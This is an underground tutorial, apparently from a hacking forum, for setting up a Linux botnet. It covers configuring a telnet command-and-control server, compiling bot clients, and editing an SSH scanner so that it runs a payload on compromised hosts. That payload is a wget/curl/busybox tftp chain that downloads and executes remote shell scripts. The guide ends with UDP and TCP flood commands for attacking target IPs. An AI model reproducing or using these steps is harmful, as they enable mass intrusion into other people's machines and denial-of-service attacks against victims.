Telnet Tutorial By Unix User #DONT SHARE THIS FUCKING SHIT     
----------------------------------------------------------------|
----------------------------------------------------------------|                                                            
Things you will need                                            |
1 VPS server for Hosting & Compileing                           |
1 VPS server for scanning                                       |
Telnet Files (Server.c,Client.c,cc2.py)                         |
----------------------------------------------------------------|
----------------------------------------------------------------|
Run The Commands Below To Set Up Server (One at a time)         |
                                                                |
yum install update -y                                           |
                                                                |
yum install gcc -y                                              |
                                                                |
yum install nano -y                                             |
                                                                |
yum install nc -y                                               |
                                                                |
yum install screen -y                                           |
                                                                |
yum install httpd -y                                            |
                                                                |
service httpd restart                                           |
----------------------------------------------------------------|
----------------------------------------------------------------|
Now To Set The Limit for the Telnet                             |
                                                                |
nano /usr/include/bits/typesizes.h (ulimit 1024 to 100000)      |
                                                                |
ulimit -n 100000 (ulimit -n to see if changed 100000)           |
----------------------------------------------------------------|
Now to start makeing the Telnet

First do the command "mkdir telnet" to make the telnet directory 

Then put the file server.c in the directory named telnet

then do nano server.c and edit the the two lines listed below 

#define MY_MGM_FLUNZYP "PasswordHere"
#define MY_MGM_FLUNZYU "UserNameHere"
and
#define MY_MGM_PORT 13

After you are done save and exit

And Run: gcc server.c -o server -pthread

Now To start the server you just do: screen ./server (Port you want bots to join) 1000 (threads) (EX: screen ./server 5 1000)

Now to connect to Telnet you open putty change connection type to RAW put your server ip in and the port you changed it too.
(If you did not change the port by default it is port 13) Then connect and you should get a black window asking for nickname and password

Once you have the telnet up its time to compile

Run the following commands 

cd /root

mkdir bin

cd bin 

Now drop the files cc2.py and client.c in there

now you have to edit your client.c 

Run the following commands

nano client.c 

now edit the line shown below

//    ___             __ _
//   / __\___  _ __  / _(_) __ _
//  / /  / _ \| '_ \| |_| |/ _` |
// / /__| (_) | | | |  _| | (_| |
// \____/\___/|_| |_|_| |_|\__, |
//                         |___/

unsigned char *commServer[] =
{
	"208.67.1.68:23"
};

Change IP to the ip of server your useing to host telnet and port to the port your screening your server on
(EX: screen ./server 5 1000 your port is 5 so you would change port to 5 EX: "YourServerIP:5")
When done Save and exit 

Now to start Compileing

Run the following commands

python cc2.py client.c (your server ip)
(EX: python cc2.py client.c 1.1.1.1)

And Let the compileing begin 

when finished you should get letters in green saying:
Your link: cd /tmp; wget http://" + ip + "/bins.sh || curl -O http://" + ip + "/bins.sh; chmod 777 bins.sh; sh bins.sh; busybox tftp " + ip + " -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; busybox tftp -r tftp2.sh -g " + ip + "; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh
copy that link from where it says cd /tmp and save it in a .txt

now to configure your scanning server.

log into your seconds server for scannning

now put the file scanner.py info the server 

now run the following commands

yum install nano -y 

yum install python-paramiko -y

then do nano scanner.py and scroll down till you find the line that says 

ssh.exec_command("cd /tmp; rm -rf *; wget http://1.1.1.1/bins.sh; chmod +x bins.sh; sh bins.sh; rm -f *; cd /tmp; wget http://1.1.1.1/bins.sh; chmod 777 bins.sh; sh bins.sh; rm -rf bins.sh")

once you have found that go back and get the line you saved as a .txt copy it and change out the command from cd /tmp all the way to the end before the ")
EX:ssh.exec_command("cd /tmp; rm -rf *; wget http://1.1.1.1/bins.sh; chmod +x bins.sh; sh bins.sh; rm -f *; cd /tmp; wget http://1.1.1.1/bins.sh; chmod 777 bins.sh; sh bins.sh; rm -rf bins.sh")
CHANGES TO
EX:ssh.exec_command("cd /tmp; wget http://" + ip + "/bins.sh || curl -O http://" + ip + "/bins.sh; chmod 777 bins.sh; sh bins.sh; busybox tftp " + ip + " -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; busybox tftp -r tftp2.sh -g " + ip + "; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh")

after your done with that save and exit and start scanneing to your server 

run the following command

python scanner.py 500 LUCKY 3 1 10

and you should see bots start joining 

this is my telnet tutorial hope you enjoyed

EXTRA:
Commands to Hit

!* UDP ip port time 32 0 10
(EX: !* UDP 1.1.1.1 53 100 32 0 10)
Same goes for TCP just change the command from !* UDP to !* TCP

Telnet Tutorial by Unix User #DONT SHARE THIS FUCKING SHIT




 